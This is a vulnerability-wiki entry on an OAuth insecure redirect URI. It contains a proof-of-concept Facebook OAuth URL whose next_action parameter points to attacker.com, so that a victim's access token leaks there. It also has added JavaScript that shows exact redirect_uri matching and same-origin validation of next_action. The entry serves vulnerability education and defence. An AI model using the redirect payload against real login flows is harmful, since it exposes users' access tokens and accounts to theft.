Cobalt Vulnerability Wiki


V4 - Access Control

OAuth Insecure Redirect URI

POC

1.) Sign in to a Facebook-linked account.


2.) Visit: https://www.facebook.com/v2.8/dialog/oauth?app_id=xxxx&client_id=xxxxx&display=popup&domain=xxxxxx&e2e=%7B%7D&locale=en_US&origin=1&redirect_uri=xxxxx/login?next_action=//attacker.com&response_type=token&scope=public_profile%2Cemail&sdk=joey&version=v2.8


3.) You'll be redirected to attacker.com and your access_token will be leaked.




Impact

Medium-High (depends on information disclosure)



Likelihood

Medium-High
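
The POC relies on the `redirect_uri` being accepted with an extra `next_action` parameter, which the login page then follows off-site. The following is an added example, not part of the original wiki entry, showing two server-side checks that address this: exact matching of `redirect_uri` and same-origin resolution of `next_action`. The origin `https://app.example` and the function names are assumptions.

```javascript
// Added example. All hosts below are constructed placeholders.
const APP_ORIGIN = "https://app.example";      // assumed: the application's own origin
const FALLBACK = APP_ORIGIN + "/";             // where to land when next_action is rejected
const REGISTERED_REDIRECT_URIS = new Set([     // assumed: URIs registered with the OAuth provider
  "https://app.example/login",
]);

// Check 1: redirect_uri must equal a registered value byte for byte.
// Prefix or "same host" matching would still accept
// https://app.example/login?next_action=//attacker.com
function isRegisteredRedirectUri(redirectUri) {
  return typeof redirectUri === "string" && REGISTERED_REDIRECT_URIS.has(redirectUri);
}

// Check 2: resolve next_action the way a browser would (WHATWG URL rules)
// and accept it only if the result stays on our own origin.
// This covers "//host", "/\host", absolute URLs and non-http schemes,
// which string checks such as startsWith("/") miss.
function safeNextAction(next) {
  if (typeof next !== "string" || next === "") return FALLBACK;
  let target;
  try {
    target = new URL(next, APP_ORIGIN);
  } catch {
    return FALLBACK;                           // unparseable input
  }
  if (target.origin !== APP_ORIGIN) return FALLBACK;
  // Return the absolute URL, not target.pathname: a pathname can itself
  // begin with "//" and would be read as another host if reused in a
  // Location header.
  return target.href;
}

// Constructed sample inputs, including the value used in the POC above.
function demo() {
  const samples = ["/dashboard?tab=1", "//attacker.com", "/\\attacker.com",
                   "https://attacker.com/cb", "javascript:alert(1)"];
  return samples.map((s) => [s, safeNextAction(s)]);
}

for (const [input, result] of demo()) {
  console.log(JSON.stringify(input), "->", result);
}
```
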

